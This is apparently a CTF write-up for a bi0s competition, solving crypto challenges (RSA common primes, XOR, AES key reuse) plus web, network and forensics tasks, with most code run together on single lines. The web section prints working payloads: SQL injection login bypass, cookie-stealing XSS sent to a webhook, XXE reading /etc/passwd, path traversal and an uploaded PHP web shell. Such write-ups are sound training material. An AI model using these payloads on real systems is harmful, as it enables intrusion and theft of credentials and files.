from the challenge script I realized we can just see all printable character's mod value with 97 can compare it with our output
from string import printableoutput = [5, 11, 0, 6, 26, 77, 48, 3, 20, 49, 48, 95, 12, 52, 10, 51, 18, 95, 55, 7, 8, 13, 6, 18, 95, 11, 48, 48, 15, 28]
full_data ={}flag = outputfor data in printable: full_data[data]=ord(data)%97for (key,val) in full_data.items():if val in output:whileTrue:try: output.index(val) flag[output.index(val)]= keyexceptValueError:breakprint(''.join(flag))
Flag: flag{M0du10_m4k3s_7hings_l00p}
2) X0rbash
1000 pts (easy)
// x0rbash.pyimport base64defaffine_cipher(text): alphabet ="abcdefghijklmnopqrstuvwxyz" rev_alphabet = alphabet[::-1] flag =""for char in text.lower():if char.isalpha(): index = alphabet.index(char) reversed_char = rev_alphabet[index] flag += reversed_charelif char =='_': flag +='_'else: flag += charreturn flagdefxor_cipher(text,key): encrypted_flag =affine_cipher(text) a = encrypted_flag.encode('utf-8') b = key.encode('utf-8') encrypted_bytes =bytes([a[i] ^ b[i %len(b)] for i inrange(len(a))]) encrypted_flag = base64.b64encode(encrypted_bytes).decode('utf-8')return encrypted_flagtext = ???key ='zoro'xor_cipher(text, key)
// Output.txt
HQYQMAAAHTAAAgYADAc=
Solution
import base64from string import ascii_lowercasedefdecrypt_xor(encrypted_flag:str,key:str): encrypted_bytes = base64.b64decode(encrypted_flag.encode('utf-8')) first = encrypted_bytes second = key.encode() decrypted_bytes =bytes([first[i] ^ second[i %len(second)] for i inrange(len(first))]) decrypted_text = decrypted_bytes.decode('utf-8') flag =""for c in decrypted_text.lower():if c.isalpha(): flag += ascii_lowercase[ascii_lowercase[::-1].index(c)]else: flag += creturn flaginp ='HQYQMAAAHTAAAgYADAc='key ='zoro'flag=decrypt_xor(inp, key)print(flag)
Flag: flag{try_all_angles}
3) Common Primes
// encrypt.pyfrom Crypto.Util.number import*modulus_list = [92917019109246520946111919259944727745544542783982355430716972006653222462839194379791358138811158902436580150837272503813213355567643909357402799120779532615133095691214112430279300157639789109680476278143116007958419546850451489904099400377262985350595742313358525673308487492326205442219054566734280849463, 130568212240286377492144613994596695460424714704485915362255855721255382599513965251301247594774250836123472395907469409589689688325774329295661798442186187372959761946857650743912997464565794093976101055331289489952844031378077429339913607083706389410418100948879873793883371819349687078725496909678189694283, 85811324434028990250875422438123814864093618278891295811031083960296969537454874943141970297507657075578669322788763313935112356048335316873984184009613837190173099517058749779303494309026026236321089968145254403129264309610852345955453506183006563596075448244968379981815939543003661119788848975062475811483, 115064079704344776522310714154365077908838161807754414730220894729951712834496200170064037105718681038883888312094754104496216926238977476483481079628965404218112773573213774902089911524937553684498516876841154214074392188918966248250666407599549523072851000357434568048726545499842775450683899565801029780317]
e =65537flag =b"flag{######################}"message =bytes_to_long(flag)ciphertext = [pow(message, e, modulus_list[i])for i inrange(4)]obj1 =open("ciphertext.txt",'w')obj1.write(str(ciphertext))
val =[]for i in modulus_list:for cp in modulus_list:if i != cp: gcd = math.gcd(i ,cp)if math.gcd(i ,cp)!=1: val.append(tuple([modulus_list.index(i), modulus_list.index(cp), gcd]))if i % cp ==0:print(i, cp)breakprint(val)
we can see modulus_list[1] and modulus_list[3] has 13403158103584691654875312162882091389210135273822952869040711113075813663245847693398203004388375426980052336954393712796420264145823062627359516243196819 in common so if we divide the modulus_list[1] and modulus_list[3] with the following common prime we can find the other prime number
p = modulus_list[1]//13403158103584691654875312162882091389210135273822952869040711113075813663245847693398203004388375426980052336954393712796420264145823062627359516243196819
print(p)q = modulus_list[3]//13403158103584691654875312162882091389210135273822952869040711113075813663245847693398203004388375426980052336954393712796420264145823062627359516243196819
print(q)
# we know
r = 13403158103584691654875312162882091389210135273822952869040711113075813663245847693398203004388375426980052336954393712796420264145823062627359516243196819
modulus_list[1] = p * r
modulus_list[3] = q * r
p = 9741600541544439688862689706828992686313606094116279597817906239712005616166763464896924040269905590703773822374840730988520935229080150735322260150692457
q = 8584848348059905544996164857566959465195363555980464951249357037740863553129591026072640896380161060909630666075815043355336369503287256957095217705220943
After reading for a while online i realized if we know known characters in the ciphertext we can find the flag.
Known Text: F - 5 L - 11 A - 0 G - 6
Cyphertext: O - 14 8 - 34 Q - 16 2 - 28
Key: J - 9 X - 23 Q - 16 W - 22
using cryptill.com
Result here is FlAg{C0nGR4TulATI0nSF0rSuCCesSFULlYBreAkInGTHeviGenereCiPhEXx} but flag format is FLAG{} and in letters there are no small letters so i capitalized
import osfrom Crypto.Cipher import AESfrom secret import flagsecret =b"This is top secret message. I hope, no one can intercept UwU !!!"iv1 = os.urandom(16)iv2 = os.urandom(16)key = os.urandom(16)flag = flag +b"\0"* (16-len(flag)%16)cipher = AES.new(iv1, AES.MODE_CBC,key)ciphertext1 = cipher.encrypt(secret)cipher = AES.new(key, AES.MODE_CBC,iv2)ciphertext2 = cipher.encrypt(flag)withopen("encrypted", "wb")as f: f.write(iv1) f.write(ciphertext1) f.write(iv2) f.write(ciphertext2)
solution
It defines a variable secret with the value "This is top secret message. I hope, no one can intercept UwU !!!". This message will be encrypted.
It generates two random initialization vectors (IVs) using os.urandom(16). IVs are used to add randomness to the encryption process.
It generates a random key using os.urandom(16). The key is used for encryption and decryption.
It pads the flag variable by adding null bytes (\0) to make its length a multiple of 16 bytes. This is necessary because AES operates on blocks of 16 bytes.
It creates an AES cipher object with the first IV (iv1) and the key (key) in CBC mode.
It encrypts the secret message using the AES cipher created in the previous step, resulting in ciphertext1.
It creates another AES cipher object with the second IV (iv2) and the key (key) in CBC mode.
It encrypts the padded flag using the second AES cipher, resulting in ciphertext2.
It writes the iv1, ciphertext1, iv2, and ciphertext2 to a file named "encrypted" in binary mode.
from Crypto.Cipher import AESdefbyte_xor(ba1,ba2):returnbytes([_a ^ _b for _a, _b inzip(ba1, ba2)])withopen('encrypted.bin', 'rb')as f: a = f.read()iv1 = a[:16]ct1 = a[16:16+64]iv2 = a[16+64:16+64+16]ct2 = a[32+64:]secret =b"This is top secret message. I hope, no one can intercept UwU !!!"iv =b'\x00'*16# empty iv to find keycipher = AES.new(iv1, AES.MODE_CBC, iv)pt1 = cipher.decrypt(ct1)key =byte_xor(pt1, secret)[:16] # this will give iv that was used # key = b'\xd2\x02\xee\x98,\x1e5$\x8fY\xaa\xb3\x00\xa4\xbc\xcd'cipher = AES.new(key, AES.MODE_CBC, iv2)print(cipher.decrypt(ct2))
It defines a helper function called byte_xor that performs a bitwise XOR operation on two byte strings.
It opens the file named "encrypted" in binary mode and reads its contents into a variable a.
It extracts the first 16 bytes from a and assigns it to iv1. This is the initialization vector (IV) used in the first encryption step.
It extracts the next 64 bytes from a and assigns it to ct1. This is the ciphertext produced by encrypting the secret message in the first encryption step.
It extracts the next 16 bytes from a and assigns it to iv2. This is the IV used in the second encryption step.
It extracts the remaining bytes from a and assigns it to ct2. This is the ciphertext produced by encrypting the padded flag in the second encryption step.
It defines a variable secret with the value "This is top secret message. I hope, no one can intercept UwU !!!". This is the original plaintext secret message used during encryption.
It defines an empty IV (iv) consisting of 16 null bytes.
It creates an AES cipher object with iv1 (the IV used in the first encryption step) and the empty IV (iv) in CBC mode.
It decrypts ct1 using the AES cipher created in the previous step, resulting in pt1 (plaintext of the first encryption step).
It performs a bitwise XOR operation between pt1 and secret and takes the first 16 bytes, which will give us the key used in the second encryption step. This key is then assigned to key.
It creates another AES cipher object with key (the key used in the second encryption step) and iv2 (the IV used in the second encryption step) in CBC mode.
It decrypts ct2 using the AES cipher created in the previous step, resulting in the decrypted version of the padded flag.
It prints the decrypted flag on the standard output.
n : 51262621421762918526093632383370534180768834026547970314343452353598602088230820806033740007328795554570642318252789666763315253509866489972304631274050880096358261400196083773961768871182868182980255954230646365163347738340923164839702959948086049748616395632937734313167798374046524562505972965628250476311
c : 36352708125237430764760060909529418780804291559038503125980629255501905387145728377360035341308086330195140200675778521280834125163178872194321306790556273663838697235094376480117986175292388705005403870523760260925627224110383230794735856903192310702009799631105903896037080675097289706993777714380538272695
Solution
We can see p, q primes are very near so i used this script which will find square root of n and increasing sq till its a multiple of n
from gmpy2 import irootn = 51262621421762918526093632383370534180768834026547970314343452353598602088230820806033740007328795554570642318252789666763315253509866489972304631274050880096358261400196083773961768871182868182980255954230646365163347738340923164839702959948086049748616395632937734313167798374046524562505972965628250476311
sq,b =iroot(n,2)while n%sq !=0: sq +=1p = sqq = n // sqprint(p)print(q)
p = 7159791995705106971518692600097404910939050335478820485341939449925205880647134325454070146449825578592400158599249475957026040350418341470093545761250817
q = 7159791995705106971518692600097404910939050335478820485341939449925205880647134325454070146449825578592400158599249475957026040350418341470093545761250583
from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long as b2lpt =b2l(b'############REDACTED#############')e1 =3e2 =65537p =getPrime(512)q =getPrime(512)n = p * qprint("p = ",p)print("q = ",q)print("n = ",n)ct1 =pow(pt,e1,n)ct2 =pow(pt,e2,n)print("ct_1 = ",ct1)print("ct_2 = ",ct2)
n : 82529003854107449655882828779306680261322514291578176914855335660196316136020891330282977862392781955576003908276918336232496428394902701712865050846177919432150024221333248869182819160724004027687615316604524956477726853341471729490579781226904750203267774815266814993007700799909440327200157743001636208979
ct_1 : 1668144786170996657595999258788854859050046938776760313024051039263047123771288332894513993152851393510238898052607710731359323557904957777106934584412944237025988585303236848198011801305784092763134546736133138274497511627826158781621349
ct_2 : 74649112917012996389389688584539047038814117242787890422412732444940527114465444367380737027429811175792775942029514501984215700751646085548563043007478959667954572646871197479085745750752565780467426634242197633017759627505025163899052769039873499225975956547197603101339946515705697532653196551891380383692
solution
The decryption code attempts to recover the original plaintext (pt) from the given ciphertexts (ct_1 and ct_2) using the knowledge of the public modulus (n) and the public exponents (e1 and e2).
It uses the iroot function from gmpy2 to compute the integer cube root of ct_1. The cube root is taken because the public exponent e is set to 3.
It extracts the first element of the tuple returned by iroot (the integer cube root), and assigns it to pt.
It converts pt from a long integer to its corresponding byte representation using long_to_bytes function from Crypto.Util.number.
It prints the resulting flag, which represents the recovered plaintext.
we know q if we divide q with n1 and n2we will find p and q
p = n1//qr = n2//q
you would be wondering why we have used // instead of / When working with cryptographic operations involving large integers, precision and exactness are crucial. Regular division (/) in Python performs floating-point division and returns a floating-point result with decimal places. This floating-point representation may introduce rounding errors and imprecisions, which can lead to incorrect results when dealing with cryptographic operations.
By using integer division (//), Python ensures that the division operation returns an integer result without any decimal places or rounding errors. This is essential in cryptography, where precise calculations are required to maintain the integrity and correctness of cryptographic algorithms and protocols.
we don't know multiplication of which numbers leads to n3 but we know randomly generated p, q, r in these p, q, r we can check which of the following multiplied to get n3
now if we find GCD with p, q, r the we will get output to be 1,1,1
This means only multiple of s is present in X3
to verify is it multiple of s we can just do this
print(((q*p*r)*(p*r)*p)*X3 == n3)
It prints True so X3 is nothing but s
we know p, q, r, s we need to just find the flag
from math import gcddefegd(e,phi): k =1while (1+k*phi)%e !=0: k +=1return (1+k*phi)//en1 = 20912910050796031830809673977674455857393320096113471000108476598239671823290454539099505006341181927803396230002338735454401646406475912688218923104360101493420587464070273323527567266113085620629777182230272649016079034035826193606941717409911127293033937511127232622025383267748018774971415071232112682518085465253677786075882388751252903758885822335201048783033607059125114129721962237031848160257840042749604701661351104632197268101338356585152993200499847224148428276285280947713025841594472924459330814475796519691496598976366224681227183057944078367988646669983887511386712300733007180288701194351474709451461
n2 = 23872426932563883914901983231692363805983070520331002447445050715524972251586497800571756559464721924549362084406494547280486962487511746912828373497887521440699329723182185403037889716533745183479525650184983301161183195860766723642989068462832335949332139360177109353246709886130607275469616829829377688389101875591693039721270258491641736695891769279331901855145276977713307839426340839804405968558066844316403038985679295562342379505784575994967680959855066641348711021844621460984249502783862934341287142019016182597959562535015183590583942937215422158669723160244494194242460279136853725071235733665302988209581
n3 = 623265548625163278510022487995567876890926533209308999370330362371439285305085412615456709572300610469764709333529406834419638261601983277055730634365116268494851890297910828294958809680835145062374334660144925073817009153363194356277972003823429825090687577884104803772423494559660272965942415656846093421497718789399057923632452460959329004642659416401533494734674341297334092185269456244649167294148756998182926381486263680657018086861695000390477334298652089510062786091483474947031402375475934819658393231455628207075109607210571629964456581753334227077161648968974473732063297259193869372494140348513893186441054530081786588494978099820939294808602649303543807725972018035561286998003180524519740327192105076194250531595088678296559426905737604898487332506263768448008370290928316965877252657591981473292067631778780063949433186833597022736100596242927881445173397533719063681933023690642498287147012288569648280776237679667255272112710330887407771683145839111961602721160726180735195355237690249090722802712929899425175942561146908593585556441325499980035838317170354479081502340112091530897868855495757738933924256969879209548844098392755956340797905688458571159105633325558683059168331041150880160341776229718860612253277689383592135954817820356993637153693807088618971309357852420077553044453663264289081544406697440268577543019319406136538822420767680430176862831205443049624222048932334457406735745145522789026912573894925384649250021447001861056286156729731381118654052424555045194332265401547466687129069693348919729472648603604207705967197358747234395578381797487161842286311601521051614443136409426549673744994567186673259410264138756018328704519923828130219209915417334306742146661470932320976746278374554809658219190409161811156640039813265447320394905627416336825499242467352625072411979139565787153117666316266128433664263573908420103316680637158744227670026017618721163233170430817916291320917442601841215726738107837455010696286492216875918830651149525869473057392158941139946159965059088434640307636983388935709069356519776673061113986935201719486791353927766209797128863955945018524614009681587930678131170189431123293320603504946629
c = 300765675631036702440523739351154897383328322310909427639150819891961020790689307369308441255403094732423274431969874729576538743620119420735510045406001994753894520763272198722820558323777418995706994461414667818537719413094635232811184202577172511003889024565202258024532325841442524255115720343283468219385208657431547944302686466963643630617734585172811247868088027325004294939532871542424327865040876468978611871974999372691163464294756117812578408540739824709677959432355997425868877804980417752642107595057064248851537732058086278189683557116314198234770298192400203155340277871276718988519131085372705342068348850422546040347545294934795160228629715928205702963059053926678039307251970985067503945484142259384931005122474633734569350468028096545310923922736277126500494960558901118391826970750599017736592975695396953268648137731306315298363276952213929906449212672277952655169301409708326657804508222562820866018885085111020645767177241778007313870356313737766211807671684466236765782369978681732347669091529835873174707088943878081394207743832495916408484710683636315373611964455948879147334744259927601718737189225141948942454372275019801444709829300827100970958900715300313378107547518939050666002906010324615404445192022240280315907630458853581194336155758396621241419237953860938727690588816954526361793957917189783860306310822734347040467227916427155488984237263951334309867259192368643799454225026080500451877047304229273388998226482371462690188525788808790286231420310667434427953649009749851835345643678202026126838640308587587491539165176588320928304857832498694961323661593475151903835366820810227102061312419087294682432081917413904639688299669590743900799344326135311955543328076735324152278029826551922472334486502065676931796120276566197522523087325802268044548699688695109433084891340455120679761061711197620052128458728329181321749503305859230167473247286327332162638070885298897162507611749649393208158266253582200354380719427286181196920627292677984198089607982851981186674993709576820550096457875619124681598635713218705170000750192136641170764054753456395228025468183484945388029949429676193689771416723243948217122509236756623
q =gcd(n1, n2)p = n1 // qr = n2//qs = n3//((q*p*r)*(p*r)*p)e =65537v = ['(p-1)*(q-1)','(p-1)*(r-1)','(p-1)*(s-1)','(q-1)*(r-1)','(q-1)*(s-1)','(r-1)*(s-1)']for phi in v:for _ in [n1,n2]:try: d =egd(e, eval(phi)) pt =hex(pow(c, d, _))[2:] bt =bytes.fromhex(pt) asciis = bt.decode("ASCII")print(f'pt: {asciis}')print(phi)exceptUnicodeDecodeError:passexceptValueError:pass
Damn its just waste of time finding value of s but I want to know why only p and q can decrypt message i realized after searching
The reason both phi = (p-1)*(q-1) and phi' = (q-1)*(r-1) work in the decryption process is due to the properties of the RSA algorithm and the mathematical relationships between the factors.
In RSA, the private exponent d is calculated as the modular multiplicative inverse of the public exponent e modulo phi. In other words, d satisfies the equation e * d ≡ 1 (mod phi).
When you calculate phi as (p-1)*(q-1) and phi' as (q-1)*(r-1), you are essentially calculating the Euler's totient function for both n3 and n1.
Since phi and phi' are derived from the prime factors of n1, they have the same value as long as the prime factors are the same, regardless of the specific arrangement of the factors. In your case, n3 = s*((q*p*r)*(p*r)*p), the factors are still p, q, and r, so both phi and phi' will yield the same value.
correct me if iam wrong!!
even my reaction was same as flag is it really RSA!!
The encryption function, encrypt(), reads the 'flag.png' file and encrypts it using AES-ECB with a custom counter, CustomCounter. The counter generates a keystream by incrementing a value and encrypting it with the AES key.
To decrypt the ciphertext, we need the AES key and the counter values used during encryption. These values are extracted from the code as follows:
The AES key is missing in the provided code. We need to find or obtain the missing key to proceed with decryption.
The counter value and its step increment are defined in the CustomCounter class. The initial counter value, value, and the step increment, step_up, are used to generate the counter values during encryption.
To decrypt the ciphertext, we use an XOR operation with the keystream obtained from the counter and the ciphertext blocks. In the provided decryption script, we can see the XOR decryption being performed.
The decryption script reads the ciphertext blocks from 'tresure.txt' and XORs each block with a pre-defined keystream. The XOR result is appended to an output list.
from Crypto.Cipher import AESrpng =b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR'output = []withopen('Treasure-data.txt', 'r')as f: block =bytes.fromhex(f.read(32)) xored = [x^y for x, y inzip(block, rpng)] rks =bytes(xored)withopen('Treasure-data.txt', 'r')as f: block =bytes.fromhex(f.read(32))while block: xored = [x^y for x, y inzip(block, rks)] output.append(bytes(xored)) block =bytes.fromhex(f.read(32))withopen('tresure.png', 'wb')as tres: tres.write(b''.join(output))
Flag: flag{7h3_0n3P1eC3_15_R34L!!}
WEB
11) Partly_stored_answers
1000 pts (EASY)
Solution
After checking source of this page we have found part one
if we go to /robots.txt we got clue and second part
if we go to /secrets/k3y
if we inspect this page we can see a script let's use it in home page
Flag: bi0s{muvmJ3k9x68SQVXArCRb5A==}
12) Laughable File Infiltration
1000 pts (EASY)
Solution
if we check source
if i go to a link /view?file=membership.txt we can see a text file
/view?file=flag.txt will give 404 so
going few dir back /view?file=../../flag.txt
Flag: bi0s{TU+9U1lFHljRrf6bPdPdkA==}
13) CookieMonster
1000 pts (EASY)
Solution
If we check cookies
if we decode it we will get
{"admin":0} to {"admin":1}
changing the cookie value in browser we got the flag
Flag: bi0s{j7xPtmm4HoLp1daTGNZvlw==}
14) Shellshocker
1000 pts (EASY)
I got First blood in this challenge.
we can execute any command here example ls
if we cat index.js we can see FLAG is taken from environment variable
we can print environtmental variables using printenv
Now searching for flag
Flag: bi0s{X4SYGaBzxFw89F4eueFCqA==}
15) Phone Book
1000 pts (EASY)
after clicking on the link we will be redirected to account?id=1
/account?id=1 if we change 1 to 0 then we can see admin phone number
Flag: bi0s{b5hG8BdtYD9Ht+6saI28BQ==}
16) Secret keeper
Soultion
So in this we have to bypass the login of master so definitely SQL injection opening it in burp
If we send Username: ' OR 1 = 1 -- and password can be anything in response we got the flag
Flag: bi0s{i4cpSd/2xP0VomAKBUtM1w==}
17) Feedback
1500 pts (MEDIUM)
I got First blood in this challenge.
Solution
our password is reflected in this page and there is a report button to submit a URL so definitely its a xss challenge
if we enter this payload
<img src=x onerror="alert(document.cookies)" />
We got a xss so if we can get admin cookies then it's done after setting up webhook
btoa is to encode the flag in base64 so that we won't miss special character if we don't use it then the special character are converted to URL encoded format it won't be as easy as decode copy and submit the flag.
If we submit with the payload above and check our webhook
the encoded flag can be decoded with atob(ZmxhZz1iaTBze2hTbEUxT29EM1hRVGpJaS82dHIrd1E9PX0=) in console we will get flag
Flag: bi0s{hSlE1OoD3XQTjIi/6tr+wQ==}
18) Xml Parser
we can just give it the following payload
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "/tmp/flag.txt"> ]>
<data>&example;</data>
Flag: bi0s{hopFCovHy+l2r24So+qcSg==}
19) Laughable File Infiltration 2
when we click on Read Poem this following request is sent
when we replace the Themoon.txt with /tmp/flag.txt
we can see in response flag is removed if we use fflaglag.txt even if i removes flag we will have flag.txt remaining.
Flag: bi0s{YAD8QkfJh4u0QQwF2u9CuQ==}
20) Ghost
2500 pts (HARD)
Solution
We can upload files here they are saved as it is in ./uploads/filename.txt
its made with php so i can upload a php reverse shell
// rev.php
<?php
echo (system($_GET["cmd"]));
?>
now after uploading the rev.php going to /uploads/rev.php?cmd=whoami
/uploads/rev.php?cmd=cat /tmp/flag.txt
Flag: bi0s{XH+Uz/yuszc4YlIFOIfD4g==}
Network security
21) Decrypt_The_Secrets
1000 pts (EASY)
Solution:
from scapy.all import*defextract_pcap_data(pcap_file): packets =rdpcap(pcap_file) data = []for packet in packets:if packet.haslayer(Raw): raw_data = packet[Raw].load data.append(raw_data)withopen('Decrypt_the_Secrets.bin', 'wb')as f: f.writelines(data)pcap_file ="./Decrypt_the_Secrets.pcapng"extract_pcap_data(pcap_file)
using the above script got data from pcapng file
hiheyI guess the cops are having an eye on usmaybe we are under the radar after the heist failureso here is the key 5 and we go on with the planyep 5 it is, I remember the other day you told me about our lanugagedju N lzjxx dtz hfs zsijwxyfsi rj wnlmy stb, fwj bj ltti yt ltdju bj hfs gjlns bnym tzw uqfs inxhzxxntsXT bj fwj ltnsl yt pnisfu ymj KGN hmnjk, bmjwj bnqq mj gj ymnx kwnifd?N fr xzwj mj bnqq gj anxnynsl ymj rzxjzr,gzy mtb it bj it ny?Ltti uqfhj ktw zx, xt bj ltssf ljy ns inxlznxji fx ymj rfnsyfnsjshj yjfryep then we can actually get close to him at any point and execute our waysxt N bnqq ljy ymj ymnslx itsjdju bj bnqq rjjy ts kwnifd ymjs.dju bj bnqq rjjy ts kwnifd ymjs.mtb fgtzy gn0x{s3yb0wp_nsyjwhjuynts_l0jx_g00rc0c0}?tpfd ymjs xjjdftpfd gtxx
This one looks like a flag gn0x{s3yb0wp_nsyjwhjuynts_l0jx_g00rc0c0}
Flag: bi0s{n3tw0rk_interception_g0es_b00mx0x0}
22) One_By_One
1000 pts (EASY)
Using the same script from the above challenge we got One_by_One.bin file from given pcap file
Hi this is a very confidential message, please do not share it with anyone. So This top secret message is only for you. and here it is bi0s{ch4mpi0n_0n_7h3_w4y_0f_3xp10i7}. Thank you. hold it safe. Bye.
Flag: bi0s{ch4mpi0n_0n_7h3_w4y_0f_3xp10i7}
23) Packet_Sniffing
1000 pts (EASY)
Opening the file in wireshark going to file > export objects > HTTP
Here we have an image let's save it and see
Renaming the file from object33.image%2fjpeg to object33.image.jpeg will give flag
Flag: bi0s{w1r35h4rk_exp0rts_1s_c00l}
24) Digital_Vault
Solution:
from scapy.all import*defextract_pcap_data(pcap_file): packets =rdpcap(pcap_file) data = []for packet in packets:if packet.haslayer(Raw): raw_data = packet[Raw].load data.append(raw_data)withopen('Digital_Vault.bin', 'wb')as f: f.writelines(data)pcap_file ="./Digital_Vault.pcap"extract_pcap_data(pcap_file)
after running this script we can open the file here there is some PNG image
From discription we know that password for zip is less than 3 characters there is the bruteforce script
import zipfilefrom string import printabledefcrack_password(password_list,obj): idx =0# with open(password_list, 'rb') as file:for _ in printable:for __ in printable: password =f"{_}{__}"# for line in file:# for word in line.split():try: idx +=1 obj.extractall(pwd=bytes(password, "utf-8"))print("Password found at line", idx)print("Password is", password)returnTrueexcept:continue# return Falsepassword_list ="/usr/share/wordlists/rockyou.txt"zip_file ="./bruteforce.zip"obj = zipfile.ZipFile(zip_file)ifcrack_password(password_list, obj)==False:print("Password not found in this file")
after running this code password is gz
Running stegseek on the extracted file
Flag: bi0s{bruting_satisfaction_for_real}
30) Upgr4d3d_f1xm3
1000 pts (EASY)
Solution:
we got a pic on opening it in hexeditor changing header from
to this
We can fix it by searching for 58 78 d3 0f and replacing it with 5a 2b d3 0f
We can fix it by searching for 0c 78 78 00 and replacing it with 0c 78 f4 00
Flag: bi0s{crc_f1xup}
31) R3c0v3rytxt
1500 pts (MEDIUM)
Got a memory dump
python3 volatility3/vol.py -f /root/challenge.raw windows.filescan.FileScan | grep flag
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
AS Layer1 : IA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/ghost/ctf/digital_defenders/actual/
blackscreen_execution/chall.raw)
PAE type : No PAE
DTB : 0x185000L
KDBG : 0x82935c28L
Number of Processors : 4
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x82936c00L
KPCR for CPU 1 : 0x80d9c000L
KPCR for CPU 2 : 0x8c01e000L
KPCR for CPU 3 : 0x8c059000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2023-06-11 14:25:53 UTC+0000
Image local date and time : 2023-06-11 07:25:53 -0700
if we do strings on it it's not useful checking it in hex editor
Flag: bi0s{m3m0ry_suprem4cy}
33) C4pt4inC0ld
1000 pts (EASY)
We got a secrets.txt
There is no room on this planet for anything less than a miracle
We gather here today to revel in the rebellion of a silent tongue
Every day, we lean forward into the light of our brightest designs & cherish the sun
Praise our hands & throats each incantation, a jubilee of a people dreaming wildly
Despite the dirt beneath our feet or the wind pushing against our greatest efforts
Soil creates things Art births change
This is the honey
& doesn’t it taste like a promise?
The password is azrael
Where your heart is an accordion
& our laughter is a soundtrack
Friend, dance to this good song—
look how it holds our names!
Each bone of our flesh-homes sings welcome
O look at the Gods dancing
as the rain reigns against a steely skyline
Where grandparents sit on the porch & nod at the spectacle
in awe of the perfection of their grandchildren’s faces
Each small discovery unearthed in its own outpour
Tomorrow our daughters will travel the world with each poem
& our sons will design cities against the backdrops of living museums
Yes! Our children will spin chalk until each equation bursts a familial tree
from this text we know password is azrael. after researching for a while i realized it is using white space steganography it can be solved by a tool stegsnow
stegsnow -C -p"azrael" secret.txt
Flag: bi0s{7h3_sn0w_0f_surpr1s3s}
34) Pr0j3ct_M3t4
1000 pts (EASY)
We got an image running exiftool on it we have a comment
